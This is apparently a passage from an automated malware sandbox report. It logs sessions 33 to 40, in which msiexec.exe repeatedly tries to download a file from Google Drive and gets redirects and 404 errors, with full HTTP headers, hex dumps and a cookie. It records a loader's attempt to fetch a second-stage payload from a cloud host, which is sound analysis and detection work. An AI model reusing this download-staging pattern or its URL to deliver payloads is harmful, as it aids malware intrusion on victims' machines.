                                                              Content-Security-Policy: script-src 'nonce-7pKabTsj85zW3WMUB159nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.849742172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:29 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:30 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRi3d3Y2OIlsvhVxvNWs1evwkUwMmEpZwWGb0aYWBqGH7JhEH4urKGfs-1GS82Ly9K6
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:29 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-1FZienMMVOpxJ0EBQZLnaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 6d 56 76 6b 56 30 58 52 34 4a 7a 44 37 39 61 46 56 52 4a 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="umVvkV0XR4JzD79aFVRJLw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.849743216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:30 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:31 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:31 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-JMyi-dBdx_41s7-3FhsODw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.849744172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:31 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:32 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTDRb1_wZSGmth2kS1GmN3fzAri9Z5-j5n635pLFeDoQGg4lLBMero5b5pAN6n9wR-W
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:32 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-Nh0wu0yUsG5HkeFSJ4rMTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 50 57 38 72 39 30 31 32 50 6f 6b 6b 52 6d 37 5a 5f 77 6d 50 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fPW8r9012PokkRm7Z_wmPA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.849745216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:33 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:33 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:33 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-t9zvf9s6mPOXoMbGZlEoNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.849746172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:34 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:34 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgThbLn6N7E-FLyM8gEELYBtm-GG7SkfBHrC5-8ec9mjV93qn4HJGpeoqCsBZRZiAhWNbh_Ypk4
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:34 GMT
                                                              Content-Security-Policy: script-src 'nonce-yvyr2wOw-mtbn_1v8vZZew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 64 5a 66 41 39 5f 73 4e 6e 63 74 4f 2d 41 5f 64 71 52 6c 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tdZfA9_sNnctO-A_dqRl4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.849747216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:35 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:35 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:35 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-R1d2rzRwx3bOJAjQ_-Tkxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.849748172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:36 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:36 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTjowg5kWfr0Wfs6wLkunZEMZxrpbgXbyeJZpSf_Rfmv6WjT3hntnc1GKVmeTEw14vS
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:36 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-_Vczn3OFxjJ22lwq6h98UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 68 54 71 4e 30 4f 62 34 34 55 4e 4b 39 75 51 79 4d 51 6f 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hhTqN0Ob44UNK9uQyMQo_w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.849749216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:37 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
